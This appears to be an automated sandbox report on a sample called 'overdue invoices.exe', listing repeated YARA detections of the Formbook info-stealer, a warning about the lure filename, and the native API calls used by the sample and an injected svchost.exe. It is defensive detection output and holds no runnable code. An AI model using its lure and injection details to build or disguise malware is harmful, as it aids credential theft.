          Source: 00000005.00000000.399598391.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.625289647.0000000002890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.625289647.0000000002890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.353489816.00000000021A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.353489816.00000000021A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.443132188.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.443132188.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.625199812.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.625199812.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.351727367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.351727367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.350667334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.350667334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.443082963.00000000008B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.443082963.00000000008B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: overdue invoices.exe
          Executable has a suspicious name (potential lure to open the executable)
          Source: overdue invoices.exeStatic file information: Suspicious name
          Source: overdue invoices.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.2.overdue invoices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.overdue invoices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.overdue invoices.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.overdue invoices.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.overdue invoices.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.overdue invoices.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.overdue invoices.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.overdue invoices.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.overdue invoices.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.overdue invoices.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.overdue invoices.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.overdue invoices.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.overdue invoices.exe.21a0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.overdue invoices.exe.21a0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.overdue invoices.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.overdue invoices.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.overdue invoices.exe.21a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.overdue invoices.exe.21a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.385434941.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.385434941.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.399598391.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.399598391.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.625289647.0000000002890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.625289647.0000000002890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.353489816.00000000021A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.353489816.00000000021A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.443132188.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.443132188.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.625199812.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.625199812.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.351727367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.351727367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.350667334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.350667334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.443082963.00000000008B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.443082963.00000000008B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403225
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 0_2_0040604C0_2_0040604C
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 0_2_004047720_2_00404772
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0041D26A1_2_0041D26A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00408C7B1_2_00408C7B
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00408C801_2_00408C80
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0041A6C61_2_0041A6C6
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009AB0901_2_009AB090
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A620A81_2_00A620A8
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C20A01_2_009C20A0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A510021_2_00A51002
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0099F9001_2_0099F900
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009B41201_2_009B4120
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009CEBB01_2_009CEBB0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A841F1_2_009A841F
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C25811_2_009C2581
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009AD5E01_2_009AD5E0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00990D201_2_00990D20
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A61D551_2_00A61D55
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A62EF71_2_00A62EF7
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009B6E301_2_009B6E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0335EBB011_2_0335EBB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03346E3011_2_03346E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03320D2011_2_03320D20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0334412011_2_03344120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0332F90011_2_0332F900
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033F1D5511_2_033F1D55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E100211_2_033E1002
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0333B09011_2_0333B090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029AD26A11_2_029AD26A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029AA6C611_2_029AA6C6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02992FB011_2_02992FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02998C8011_2_02998C80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02998C7B11_2_02998C7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02992D9011_2_02992D90
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: String function: 0099B150 appears 34 times
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_004185E0 NtCreateFile,1_2_004185E0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00418690 NtReadFile,1_2_00418690
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00418710 NtClose,1_2_00418710
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_004187C0 NtAllocateVirtualMemory,1_2_004187C0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0041868B NtReadFile,1_2_0041868B
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0041870A NtClose,1_2_0041870A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_004187BA NtAllocateVirtualMemory,1_2_004187BA
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_009D98F0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9840 NtDelayExecution,LdrInitializeThunk,1_2_009D9840
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_009D9860
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D99A0 NtCreateSection,LdrInitializeThunk,1_2_009D99A0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_009D9910
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_009D9A00
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9A20 NtResumeThread,LdrInitializeThunk,1_2_009D9A20
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9A50 NtCreateFile,LdrInitializeThunk,1_2_009D9A50
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D95D0 NtClose,LdrInitializeThunk,1_2_009D95D0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9540 NtReadFile,LdrInitializeThunk,1_2_009D9540
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_009D96E0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_009D9660
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9780 NtMapViewOfSection,LdrInitializeThunk,1_2_009D9780
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_009D97A0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9FE0 NtCreateMutant,LdrInitializeThunk,1_2_009D9FE0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9710 NtQueryInformationToken,LdrInitializeThunk,1_2_009D9710
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D98A0 NtWriteVirtualMemory,1_2_009D98A0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9820 NtEnumerateKey,1_2_009D9820
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009DB040 NtSuspendThread,1_2_009DB040
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D99D0 NtCreateProcessEx,1_2_009D99D0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9950 NtQueueApcThread,1_2_009D9950
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9A80 NtOpenDirectoryObject,1_2_009D9A80
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9A10 NtQuerySection,1_2_009D9A10
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009DA3B0 NtGetContextThread,1_2_009DA3B0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9B00 NtSetValueKey,1_2_009D9B00
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D95F0 NtQueryInformationFile,1_2_009D95F0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009DAD30 NtSetContextThread,1_2_009DAD30
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9520 NtWaitForSingleObject,1_2_009D9520
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9560 NtWriteFile,1_2_009D9560
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D96D0 NtCreateKey,1_2_009D96D0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D9610 NtEnumerateValueKey,1_2_009D9610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369710 NtQueryInformationToken,LdrInitializeThunk,11_2_03369710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369780 NtMapViewOfSection,LdrInitializeThunk,11_2_03369780
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369FE0 NtCreateMutant,LdrInitializeThunk,11_2_03369FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03369660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369650 NtQueryValueKey,LdrInitializeThunk,11_2_03369650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369A50 NtCreateFile,LdrInitializeThunk,11_2_03369A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033696E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_033696E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033696D0 NtCreateKey,LdrInitializeThunk,11_2_033696D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_03369910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369540 NtReadFile,LdrInitializeThunk,11_2_03369540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033699A0 NtCreateSection,LdrInitializeThunk,11_2_033699A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033695D0 NtClose,LdrInitializeThunk,11_2_033695D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369860 NtQuerySystemInformation,LdrInitializeThunk,11_2_03369860
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369840 NtDelayExecution,LdrInitializeThunk,11_2_03369840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369730 NtQueryVirtualMemory,11_2_03369730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0336A710 NtOpenProcessToken,11_2_0336A710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369B00 NtSetValueKey,11_2_03369B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369770 NtSetInformationFile,11_2_03369770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0336A770 NtOpenThread,11_2_0336A770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369760 NtOpenProcess,11_2_03369760
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0336A3B0 NtGetContextThread,11_2_0336A3B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033697A0 NtUnmapViewOfSection,11_2_033697A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369A20 NtResumeThread,11_2_03369A20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369610 NtEnumerateValueKey,11_2_03369610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369A10 NtQuerySection,11_2_03369A10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369A00 NtProtectVirtualMemory,11_2_03369A00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369670 NtQueryInformationProcess,11_2_03369670
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369A80 NtOpenDirectoryObject,11_2_03369A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0336AD30 NtSetContextThread,11_2_0336AD30
